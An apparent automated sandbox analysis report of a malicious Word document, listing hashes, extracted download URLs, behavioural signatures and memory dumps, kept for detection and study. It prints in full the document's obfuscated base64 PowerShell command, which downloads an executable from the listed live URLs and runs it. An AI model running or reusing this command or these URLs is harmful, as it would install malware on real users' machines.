Analysis
-
max time kernel
131s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-05-2022 05:24
Static task
static1
Behavioral task
behavioral1
Sample
fddwfhwu.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
fddwfhwu.doc
Resource
win10v2004-20220414-en
General
-
Target
fddwfhwu.doc
-
Size
178KB
-
MD5
8edc3c8487342e650a803d995eda3aee
-
SHA1
eed3e8ce919a1ed602997d1a1137f8d19a554b25
-
SHA256
d264878eae29d3da022f38e67a38560346ba42cbb6dbebbf0e6c852c666fb1ac
-
SHA512
1b7500d183db31f3f5eefd80a62a9eaf36aff9024c7c2b37f5e8525b3633db4bab7441ea2e7914cec269bf6a9d403b55273295f6953fda53ab1906c2d986d272
Malware Config
Extracted
https://www.hhbiao.com/ro/hEGGg/
https://kissanime24.com/anime/tnqblnm875789/
http://ahansatan.com/wp-admin/IPTpsJjvkKHDM/
http://goldoni.co.uk/bmnfg411/qQmxCDIzDcR/
http://hirken.com.au/images/kul5uy3a48/
http://hofhuistechniek.nl/localhost/ZDN9mtkv7hsl25097064/
http://itcnt.com.np/2xk_kxs_r3u3g4/u2ka4qa5362685/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 4380 powersheLL.exe -
Blocklisted process makes network request 9 IoCs
Processes:
powersheLL.exeflow pid process 31 2000 powersheLL.exe 44 2000 powersheLL.exe 54 2000 powersheLL.exe 67 2000 powersheLL.exe 70 2000 powersheLL.exe 72 2000 powersheLL.exe 74 2000 powersheLL.exe 76 2000 powersheLL.exe 78 2000 powersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2824 WINWORD.EXE 2824 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powersheLL.exepid process 2000 powersheLL.exe 2000 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 2000 powersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2824 WINWORD.EXE 2824 WINWORD.EXE 2824 WINWORD.EXE 2824 WINWORD.EXE 2824 WINWORD.EXE 2824 WINWORD.EXE 2824 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fddwfhwu.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABMAF8AdgB1ADcAMgA0AD0AKAAnAEoAXwAnACsAJwAzADYAJwArACcANgAxAG4AJwApADsAJgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBQAFwAbwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBDAFQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAVQBgAFIAaQBUAHkAcABgAFIAbwB0AGAAbwBDAG8ATAAiACAAPQAgACgAJwB0AGwAcwAnACsAJwAxADIALAAgAHQAJwArACcAbABzACcAKwAnADEAMQAsACAAdABsAHMAJwApADsAJABKADMAZgA4ADMAbgBsACAAPQAgACgAJwBOACcAKwAnAHQAJwArACcANgB1AHcAZgB2ACcAKQA7ACQATAAwAHMAMgBuAF8AeAA9ACgAJwBCAG0AYgBkAHUAXwAnACsAJwBiACcAKQA7ACQARgB2ADgAaAA5ADIAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcATgBkAHQATwBmAGYAaQAnACsAJwBjAGUAMgAwADEAOQBOACcAKwAnAGQAdAAnACkALgAiAFIARQBQAGAATABhAGMARQAiACgAKABbAGMAaABhAFIAXQA3ADgAKwBbAGMAaABhAFIAXQAxADAAMAArAFsAYwBoAGEAUgBdADEAMQA2ACkALABbAFMAdAByAGkATgBnAF0AWwBjAGgAYQBSAF0AOQAyACkAKQArACQASgAzAGYAOAAzAG4AbAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7ACQAVQB5ADUAMABfAHoAdQA9ACgAJwBLADEAbwAnACsAJwBpAHMAMgB2ACcAKQA7ACQAUABiAHIAYgBlAHQAbgA9AC4AKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAEUAYgBDAEwAaQBlAE4AVAA7ACQASABfAG8ANwBzAHQAOAA9ACgAJwBoACcAKwAnAHQAdABwAHMAOgAnACsAJwAvAC8AdwB3ACcAKwAnAHcALgAnACsAJwBoACcAKwAnAGgAJwArACcAYgBpAGEAbwAuACcAKwAnAGMAbwBtACcAKwAnAC8AcgBvAC8AJwArACcAaABFAEcARwBnAC8AJwArACcAKgBoACcAKwAnAHQAdABwAHMAOgAvAC8AawBpAHMAcwBhAG4AaQBtAGUAJwArACcAMgA0AC4AYwBvAG0ALwBhAG4AaQBtAGUALwB0AG4AcQBiAGwAJwArACcAbgBtADgAJwArACcANwA1ADcAOAAnACsAJwA5AC8AKgBoACcAKwAnAHQAdABwADoALwAvAGEAaABhAG4AcwAnACsAJwBhAHQAYQBuAC4AYwBvACcAKwAnAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBJAFAAJwArACcAVAAnACsAJwBwAHMASgBqACcAKwAnAHYAawAnACsAJwBLACcAKwAnAEgARABNAC8AKgBoAHQAdABwADoALwAnACsAJwAvAGcAbwBsAGQAbwBuAGkALgBjAG8ALgB1AGsALwBiAG0AbgBmAGcANAAxADEALwBxAFEAbQB4ACcAKwAnAEMARABJAHoARABjAFIALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvACcAKwAnAC8AaABpAHIAawBlAG4ALgBjAG8AbQAuAGEAdQAvAGkAbQAnACsAJwBhACcAKwAnAGcAZQBzAC8AawB1AGwANQB1AHkAJwArACcAMwBhACcAKwAnADQAOAAvACoAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwBoACcAKwAnAG8AZgBoAHUAaQBzAHQAJwArACcAZQAnACsAJwBjAGgAJwArACcAbgBpAGUAawAuAG4AbAAvAGwAJwArACcAbwBjAGEAbAAnACsAJwBoAG8AcwB0AC8AWgBEAE4AJwArACcAOQBtACcAKwAnAHQAawAnACsAJwB2ADcAaABzACcAKwAnAGwAMgA1ADAAJwArACcAOQA3ACcAKwAnADAANgA0AC8AKgBoACcAKwAnAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGkAdABjACcAKwAnAG4AdAAuACcAKwAnAGMAbwBtAC4AbgBwAC8AMgB4AGsAJwArACcAXwBrACcAKwAnAHgAcwBfAHIAJwArACcAMwB1ADMAZwA0AC8AdQAyAGsAYQA0AHEAJwArACcAYQA1ACcAKwAnADMAJwArACcANgAyACcAKwAnADYAOAAnACsAJwA1AC8AJwApAC4AIgBTAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAYQBlADgAaQBjADcAPQAoACcASQBtADQAcwAnACsAJwB5AGsAOAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAG8AdQByAGMAZQB0ACAAaQBuACAAJABIAF8AbwA3AHMAdAA4ACkAewB0AHIAeQB7ACQAUABiAHIAYgBlAHQAbgAuACIARABvAFcATgBgAGwATwBhAEQAYABGAEkAbABlACIAKAAkAFUAbwB1AHIAYwBlAHQALAAgACQARgB2ADgAaAA5ADIAdAApADsAJABNAG4AMwAwAGwAeAB2AD0AKAAnAEsANgBtAHkAdwAnACsAJwBvACcAKwAnADkAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEYAdgA4AGgAOQAyAHQAKQAuACIAbABFAE4AYABHAHQASAAiACAALQBnAGUAIAAyADYAMwA0ADgAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAoACQARgB2ADgAaAA5ADIAdAApADsAJABUAHoAdAA2AGUAaQB6AD0AKAAnAEwAeAAnACsAJwB5ADgAYgAnACsAJwBhAGQAJwApADsAYgByAGUAYQBrADsAJABXADIAZgBfAHgAMAAzAD0AKAAnAEoAcwAnACsAJwBvADIAaQA0ADkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNADIAOAB3AG8AegBuAD0AKAAnAEMAJwArACcAZwA3ACcAKwAnAGEAOQA3AG4AJwApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2000-148-0x000001A7D5A50000-0x000001A7D5A72000-memory.dmpFilesize
136KB
-
memory/2000-149-0x00007FFDC0490000-0x00007FFDC0F51000-memory.dmpFilesize
10.8MB
-
memory/2824-136-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmpFilesize
64KB
-
memory/2824-134-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-143-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-135-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmpFilesize
64KB
-
memory/2824-130-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-137-0x00000187DB310000-0x00000187DB314000-memory.dmpFilesize
16KB
-
memory/2824-138-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-140-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-144-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-142-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-154-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-133-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-141-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-145-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-146-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-147-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB
-
memory/2824-131-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-132-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-151-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-152-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-153-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2824-139-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmpFilesize
516KB